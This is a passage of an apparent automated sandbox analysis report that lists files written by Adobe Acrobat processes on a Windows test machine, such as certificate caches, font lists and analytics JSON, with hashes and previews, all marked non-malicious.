                                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                      Category:dropped
                                                                      Size (bytes):71954
                                                                      Entropy (8bit):7.996617769952133
                                                                      Encrypted:true
                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                      Malicious:false
                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):192
                                                                      Entropy (8bit):2.7673182398396405
                                                                      Encrypted:false
                                                                      SSDEEP:3:kkFklM5pvfllXlE/HT8koclh1NNX8RolJuRdxLlGB9lQRYwpDdt:kKV5pQT8Gz7NMa8RdWBwRd
                                                                      MD5:EB4CF9D5BA518FF750C9993D89140AB9
                                                                      SHA1:4CEF94FBE03CA3EA9455BD5EFD85D4882D9CF039
                                                                      SHA-256:55EDFC4E9F696E8C45DCDE7119B62B8618BCA5B7A27F411DE4766EFF44C991C6
                                                                      SHA-512:CD93874D2BB1DF8923F5309D19A5053EF6086B4408E1F0506DDAEB27F48A5011D1981B4007413E74204BBEFFCE4B28965545D912CF5EE7400CE90D55778CD424
                                                                      Malicious:false
                                                                      Preview:p...... .........[Y.RO..(....................................................... ..........W.....Q..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):328
                                                                      Entropy (8bit):3.1382935058119616
                                                                      Encrypted:false
                                                                      SSDEEP:6:kK2sD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:TaDnLNkPlE99SNxAhUe/3
                                                                      MD5:BA99880278A26A19D6B7033C34DF68A0
                                                                      SHA1:5AB0FE8CCF5428BDAECACD5F8D724664414C56EE
                                                                      SHA-256:00BA7334024D66F53BE1B772E2719E1D16CD53675F8824447ACCC8A03FE2B14C
                                                                      SHA-512:D5309420E4FE3BA383CDFC61256E6683C7E814F9451E0FB0FCDFC07C47F8470DADB689D7B75092995226C3B840A6D45359D509C4B4541E65DEF5AFC41E8757DC
                                                                      Malicious:false
                                                                      Preview:p...... ........{sf,RO..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):1233
                                                                      Entropy (8bit):5.233980037532449
                                                                      Encrypted:false
                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7404

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):1233
                                                                      Entropy (8bit):5.233980037532449
                                                                      Encrypted:false
                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):1233
                                                                      Entropy (8bit):5.233980037532449
                                                                      Encrypted:false
                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):10880
                                                                      Entropy (8bit):5.214360287289079
                                                                      Encrypted:false
                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7404

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):10880
                                                                      Entropy (8bit):5.214360287289079
                                                                      Encrypted:false
                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):295
                                                                      Entropy (8bit):5.347949571956656
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJM3g98kUwPeUkwRe9:YvXKXod2Zc0vkiGMbLUkee9
                                                                      MD5:239852843911E4DE043360F828684880
                                                                      SHA1:D5DC71104BDAB1383F1596A0557B4C6C534081E1
                                                                      SHA-256:EDC57E19918E1C8872A4713BEFD04D3637815CF0649CD4A00E4F5C9FC835E092
                                                                      SHA-512:24C9E9457712E40CAE715B2ACB74A2D512BA61307D7174FE96C2009480ADC70C23C54875F412B92C4353F8A27208EAEDD43CAC0875BA2C2C0E1D964126F2900D
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):294
                                                                      Entropy (8bit):5.2980357492673
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfBoTfXpnrPeUkwRe9:YvXKXod2Zc0vkiGWTfXcUkee9
                                                                      MD5:FEF053330C7893328EEE956D9BE5A1BC
                                                                      SHA1:D57F01FB32DE1F9D492A43A7016BE76E66A26AAF
                                                                      SHA-256:6B804FBA43B26E0C2094E154C561F2DD2695737950A195D95E76824096F67C0D
                                                                      SHA-512:76FF9A8F5A56F12CAC44CAE9771D275C184D729B19756C2BC913A0E9708D6F6B9713FFD12347D6730EF1E0D8987A7BEE458336884D5FAFDC749F2AC8D12B6812
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):294
                                                                      Entropy (8bit):5.276741963494178
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfBD2G6UpnrPeUkwRe9:YvXKXod2Zc0vkiGR22cUkee9
                                                                      MD5:8B5D3672B14426EFEDEE7BA169137623
                                                                      SHA1:F4DF697D505050265371606FF310E6A19D0E7474
                                                                      SHA-256:CE047136648D35884D72C2C56AF295C2A63ECD05E8116A0F3906405A0EBEE839
                                                                      SHA-512:6B7EE36EB2D4180DFD5E8ED0753544D9F2236A6706AD65C209951F8EA5D37569CC03504FF7B3AEAC16D6D9ED74F7DCE587BCE41AD31B0ACD78CF30D652BB8D6F
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):285
                                                                      Entropy (8bit):5.334419242560217
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfPmwrPeUkwRe9:YvXKXod2Zc0vkiGH56Ukee9
                                                                      MD5:F049840D8A1CDA25458A71DFB671F2B3
                                                                      SHA1:99B752AB7661FF03B3EC63D1E6E0630B70A5AC59
                                                                      SHA-256:575605381A9FA4262F5FAB5F6CB542DD2BEC8E7B8857C3B2B15958914C8AFA67
                                                                      SHA-512:9C96246C2E550821246EA598B05EB0F280A9D5393110C3BB4A74EF23123576E27BA697E8E1F75BE16B413CD1D42A9AAEDAFACE53B598BF09B3042452FBDE5A56
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):1123
                                                                      Entropy (8bit):5.690264896322464
                                                                      Encrypted:false
                                                                      SSDEEP:24:Yv6Xg2zv+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSK:YvLuWhgy6SAFv5Ah8cv/K
                                                                      MD5:83CFB3EC88A1763E4A2158BB07FA13E8
                                                                      SHA1:7D273C625F2A8A4ED419FD0CD06EBA13BF2D652B
                                                                      SHA-256:8D76950C18EC716AF31EC68787044C929642755E46D4B72E48675F9F17D4E2B7
                                                                      SHA-512:069764461F428969D4D848B76C3A6DE4771F0CA9D3DE8926E4B6B901160E0D1CABC22B77358AE99DB09AE01D436F936F321A587EA452ADA47F584EDF788307CD
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.282544929850892
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJf8dPeUkwRe9:YvXKXod2Zc0vkiGU8Ukee9
                                                                      MD5:FAB922A40E762B75FBD88AC824E9644A
                                                                      SHA1:6AFF6BB822027D5AE2C46C4D61499D0E09C6AD3D
                                                                      SHA-256:15CC68687B04BCFAD7F34700636A8228EB030E9F2422721FE9527ACD4B8A0575
                                                                      SHA-512:481E4775B9D70DFC4F10C8EB390678F316DA9E9A2803B753222421EB1C23E37E8C6373831BF59A5EAE1EBEDB1BB383A9C7BD0AA09EB937AE9806EE39CEDE870D
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):292
                                                                      Entropy (8bit):5.28720649717847
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfQ1rPeUkwRe9:YvXKXod2Zc0vkiGY16Ukee9
                                                                      MD5:66AC91968AB3A68E7E6CA1E9A6BBBE47
                                                                      SHA1:70DFF9F5177312ADCEE3158C908D89687D1E2617
                                                                      SHA-256:8D838CA1719860BF57F7142197368FD6A74A67AF8A92DB13E8C450730C4A7444
                                                                      SHA-512:E712BFEC5114368EE461495960719838A58EA62631246160A7B17108259E5EACB4674D0D70A6394939B2ED097C788EB0FE7302FD2D3AC9A2D1B6C6CA0468530F
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.292353145864045
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfFldPeUkwRe9:YvXKXod2Zc0vkiGz8Ukee9
                                                                      MD5:68DEC50CAB108C941BAD637B33B6E7B7
                                                                      SHA1:6FE8EB878A6AADEE2D6E0DE97BF44F6D5780A1C2
                                                                      SHA-256:AD98EDBC7DBE50EB04C81DA298C0222769B9F2E9CED388F2C5798DA384E6D0D4
                                                                      SHA-512:4C4402E01983D1404704621A0E554E0A930B149FBC250FCEBC4FFAAFEF03AC147DF2AC02374E23E128FC5086659DEAB55CA39FC34B41D45CD378DC627B461D95
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):295
